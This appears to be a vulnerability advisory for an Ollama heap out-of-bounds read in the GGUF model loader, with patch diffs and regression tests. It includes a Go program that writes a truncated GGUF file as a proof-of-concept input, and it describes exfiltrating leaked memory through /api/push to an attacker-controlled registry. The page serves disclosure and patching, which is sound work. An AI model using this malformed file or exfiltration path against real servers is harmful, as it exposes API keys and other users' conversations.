CVE-2026-7482
Description
Ollama before 0.17.1 contains a heap out-of-bounds read vulnerability in the GGUF model loader. The /api/create endpoint accepts an attacker-supplied GGUF file in which the declared tensor offset and size exceed the file's actual length; during quantization in fs/ggml/gguf.go and server/quantization.go (WriteTo()), the server reads past the allocated heap buffer. The leaked memory contents may include environment variables, API keys, system prompts, and concurrent users' conversation data, and can be exfiltrated by uploading the resulting model artifact through the /api/push endpoint to an attacker-controlled registry. The /api/create and /api/push endpoints have no authentication in the upstream distribution. Default deployments bind to 127.0.0.1, but the documented OLLAMA_HOST=0.0.0.0 configuration is widely used in practice (large public-internet exposure observed).
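As a rough illustration of the malformed input (a hypothetical sketch, not taken from the advisory; field layout per the public GGUF v3 specification), the program below writes a single-tensor GGUF whose header declares 512×2 F32 elements (4,096 bytes) while the data section holds only 32 bytes, matching the truncated-tensor shape used in the patch's regression tests:

```go
package main

// Sketch of a truncated GGUF file, assuming the public GGUF v3 layout:
// magic, version, tensor count, KV count, KV pairs, tensor infos, then
// alignment-padded tensor data. The tensor declares 512*2 F32 elements
// (4096 bytes) but the file carries only 32 bytes of tensor data, so
// offset+size exceeds the file length.
import (
	"encoding/binary"
	"io"
	"os"
)

func writeString(f *os.File, s string) {
	binary.Write(f, binary.LittleEndian, uint64(len(s))) // GGUF strings: u64 length + bytes
	f.WriteString(s)
}

func main() {
	f, _ := os.Create("truncated.gguf")
	defer f.Close()

	f.WriteString("GGUF")                           // magic
	binary.Write(f, binary.LittleEndian, uint32(3)) // version 3
	binary.Write(f, binary.LittleEndian, uint64(1)) // tensor count
	binary.Write(f, binary.LittleEndian, uint64(1)) // metadata KV count

	// Single metadata pair: general.architecture = "llama" (value type 8 = string).
	writeString(f, "general.architecture")
	binary.Write(f, binary.LittleEndian, uint32(8))
	writeString(f, "llama")

	// Tensor info: name, n_dims, dims, dtype (0 = F32), data offset.
	writeString(f, "blk.0.attn.weight")
	binary.Write(f, binary.LittleEndian, uint32(2))
	binary.Write(f, binary.LittleEndian, uint64(512))
	binary.Write(f, binary.LittleEndian, uint64(2))
	binary.Write(f, binary.LittleEndian, uint32(0))
	binary.Write(f, binary.LittleEndian, uint64(0))

	// Pad to the default 32-byte alignment, then write far fewer bytes
	// than the 4096 the header claims.
	pos, _ := f.Seek(0, io.SeekCurrent)
	f.Write(make([]byte, (32-pos%32)%32))
	f.Write(make([]byte, 32))
}
```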
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| github.com/ollama/ollama (Go) | < 0.17.1 | 0.17.1 |
Affected products
Patches
Commit 88d57d0483cc: "ggml: ensure tensor size is valid"
4 files changed · +96 −10
fs/ggml/gguf.go (+15 −0, modified)

```diff
@@ -245,7 +245,22 @@ func (llm *gguf) Decode(rs io.ReadSeeker) error {
 	padding := ggufPadding(offset, int64(alignment))
 	llm.tensorOffset = uint64(offset + padding)
 
+	// get file size to validate tensor bounds
+	fileSize, err := rs.Seek(0, io.SeekEnd)
+	if err != nil {
+		return fmt.Errorf("failed to determine file size: %w", err)
+	}
+
+	if _, err := rs.Seek(offset, io.SeekStart); err != nil {
+		return fmt.Errorf("failed to seek back after size check: %w", err)
+	}
+
 	for _, tensor := range llm.tensors {
+		tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size()
+		if tensorEnd > uint64(fileSize) {
+			return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)", tensor.Name, tensorEnd, fileSize)
+		}
+
 		offset, err := rs.Seek(0, io.SeekCurrent)
 		if err != nil {
 			return fmt.Errorf("failed to get current offset: %w", err)
```
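For reference, the `tensor.Size()` value compared above is the expected byte length derived from the tensor's shape and element type. A simplified stand-in (a hypothetical helper covering F32/F16 only, not Ollama's actual implementation, which also handles block-quantized types) shows the arithmetic the bounds check relies on:

```go
// expectedSize mirrors what a Tensor.Size()-style method computes for
// simple element types: total elements times bytes per element. Real GGUF
// kinds include block-quantized formats whose size is computed per block.
func expectedSize(shape []uint64, kind uint32) uint64 {
	elems := uint64(1)
	for _, dim := range shape {
		elems *= dim
	}
	switch kind {
	case 0: // F32
		return elems * 4
	case 1: // F16
		return elems * 2
	default: // block-quantized kinds omitted in this sketch
		return 0
	}
}
```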
fs/ggml/gguf_test.go (+38 −10, modified)

```diff
@@ -11,21 +11,21 @@ import (
 )
 
 func TestWriteGGUF(t *testing.T) {
-	b := bytes.NewBuffer(make([]byte, 2*3))
+	tensorData := make([]byte, 2*3*4) // 6 F32 elements = 24 bytes
 
 	for range 8 {
 		t.Run("shuffle", func(t *testing.T) {
 			t.Parallel()
 
 			ts := []*Tensor{
-				{Name: "token_embd.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "blk.0.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "blk.0.attn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "blk.1.ffn_up.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "blk.2.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "blk.1.ffn_down.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "blk.0.attn_k.weight", Shape: []uint64{2, 3}, WriterTo: b},
-				{Name: "output_norm.weight", Shape: []uint64{3, 2}, WriterTo: b},
-				{Name: "output.weight", Shape: []uint64{3, 2}, WriterTo: b},
+				{Name: "token_embd.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "blk.0.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "blk.0.attn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "blk.1.ffn_up.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "blk.2.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "blk.1.ffn_down.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "blk.0.attn_k.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "output_norm.weight", Shape: []uint64{3, 2}, WriterTo: bytes.NewReader(tensorData)},
+				{Name: "output.weight", Shape: []uint64{3, 2}, WriterTo: bytes.NewReader(tensorData)},
 			}
 
 			rand.Shuffle(len(ts), func(i, j int) {
@@ -98,4 +98,32 @@ func TestWriteGGUF(t *testing.T) {
 			}
 		})
 	}
+
+	t.Run("truncated_tensor_data", func(t *testing.T) {
+		t.Parallel()
+
+		ts := []*Tensor{
+			{Name: "blk.0.attn.weight", Kind: 0, Shape: []uint64{512, 2}, WriterTo: bytes.NewBuffer(make([]byte, 32))},
+		}
+
+		w, err := os.CreateTemp(t.TempDir(), "truncated_*.bin")
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer w.Close()
+
+		if err := WriteGGUF(w, KV{"general.architecture": "test"}, ts); err != nil {
+			t.Fatal(err)
+		}
+
+		r, err := os.Open(w.Name())
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer r.Close()
+
+		if _, err := Decode(r, -1); err == nil {
+			t.Error("Decode should reject GGUF files where tensor data extends beyond file size")
+		}
+	})
 }
```
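If the repository layout matches the paths above, the new regression test can be exercised on its own with `go test ./fs/ggml -run 'TestWriteGGUF/truncated_tensor_data'`.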
server/quantization.go (+3 −0, modified)

```diff
@@ -33,6 +33,9 @@ func (q quantizer) WriteTo(w io.Writer) (int64, error) {
 		slog.Warn("file read error", "tensor", q.from.Name, "file", q.Name(), "error", err)
 		return 0, fmt.Errorf("unable to read tensor %s from %s: %s", q.from.Name, q.Name(), err)
 	}
+	if uint64(len(data)) < q.from.Size() {
+		return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v", q.from.Name, len(data), q.from.Size(), q.from.Shape)
+	}
 	var f32s []float32
 	newType := fsggml.TensorType(q.to.Kind)
 	if fsggml.TensorType(q.from.Kind) == fsggml.TensorTypeF32 {
```
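The length check matters because ggml-style Go code typically reinterprets the raw byte slice as typed data via `unsafe`. The fragment below is an illustration of that failure mode under that assumption, not Ollama's exact quantizer code, showing how an undersized buffer becomes an out-of-bounds heap read:

```go
package main

import "unsafe"

// leakyReinterpret illustrates the pre-patch hazard: reinterpreting a
// 32-byte buffer as 1024 float32 values yields a slice spanning ~4 KiB
// beyond the allocation, so adjacent heap memory is read as weights.
func leakyReinterpret() []float32 {
	data := make([]byte, 32) // what the truncated file actually provides
	elems := 512 * 2         // what the declared shape promises (4096 bytes)
	return unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), elems)
}
```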
server/quantization_test.go (+40 −0, modified)

```diff
@@ -173,6 +173,7 @@ func TestQuantizeModel(t *testing.T) {
 		tensors             []*fsggml.Tensor
 		newType             string
 		expectedTensorTypes map[string]fsggml.TensorType
+		expectErr           bool
 	}{
 		{
 			name: "f16_q4_k",
@@ -253,6 +254,36 @@ func TestQuantizeModel(t *testing.T) {
 				"output.weight": fsggml.TensorTypeQ8_0,
 			},
 		},
+		{
+			name: "f32_short_data",
+			kv: map[string]any{
+				"general.architecture": "foo",
+			},
+			tensors: []*fsggml.Tensor{
+				{
+					Name: "blk.0.attn.weight", Kind: uint32(fsggml.TensorTypeF32),
+					Offset: uint64(0), Shape: []uint64{512, 2},
+					WriterTo: bytes.NewReader(make([]byte, 32)),
+				},
+			},
+			newType:   "Q4_K",
+			expectErr: true,
+		},
+		{
+			name: "f16_short_data",
+			kv: map[string]any{
+				"general.architecture": "foo",
+			},
+			tensors: []*fsggml.Tensor{
+				{
+					Name: "blk.0.attn.weight", Kind: uint32(fsggml.TensorTypeF16),
+					Offset: uint64(0), Shape: []uint64{512, 2},
+					WriterTo: bytes.NewReader(make([]byte, 32)),
+				},
+			},
+			newType:   "Q4_K",
+			expectErr: true,
+		},
 	}
 
 	for _, tt := range cases {
@@ -264,6 +295,9 @@ func TestQuantizeModel(t *testing.T) {
 		}
 		defer fp.Close()
 		meta, err := fsggml.Decode(fp, -1)
+		if tt.expectErr && err != nil {
+			return
+		}
 		if err != nil {
 			t.Fatal(err.Error())
 		}
@@ -283,6 +317,12 @@ func TestQuantizeModel(t *testing.T) {
 		}
 
 		err = quantize(fp, tmp, meta, ftype, progress)
+		if tt.expectErr {
+			if err == nil {
+				t.Fatal("expected quantize to return an error")
+			}
+			return
+		}
 		if err != nil {
 			t.Fatalf("error during quantize: %s", err)
 		}
```
Commit 9d902d63ce9e: "ggml: ensure tensor size is valid" (#14406)
4 files changed · +96 −10 (identical diff to commit 88d57d0483cc above)
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- github.com/ollama/ollama/commit/88d57d0483cca907e0b23a968c83627a20b21047 (NVD: Patch)
- github.com/ollama/ollama/pull/14406 (NVD: Issue Tracking, Patch)
- github.com/advisories/GHSA-x8qc-fggm-mpqg (GHSA: Advisory)
- nvd.nist.gov/vuln/detail/CVE-2026-7482 (GHSA: Advisory)
- github.com/ollama/ollama/releases/tag/v0.17.1 (NVD: Release Notes)
News mentions
- Ollama Out-of-Bounds Read Vulnerability Allows Remote Process Memory Leak (The Hacker News · May 10, 2026)
- Unpatched flaws turn Ollama’s auto-updater into a persistent RCE vector, researchers say (Help Net Security · May 5, 2026)
- Critical Bug Could Expose 300,000 Ollama Deployments to Information Theft (SecurityWeek · May 5, 2026)
- AI Threat Landscape Digest January-February 2026 (Check Point Research · Mar 29, 2026)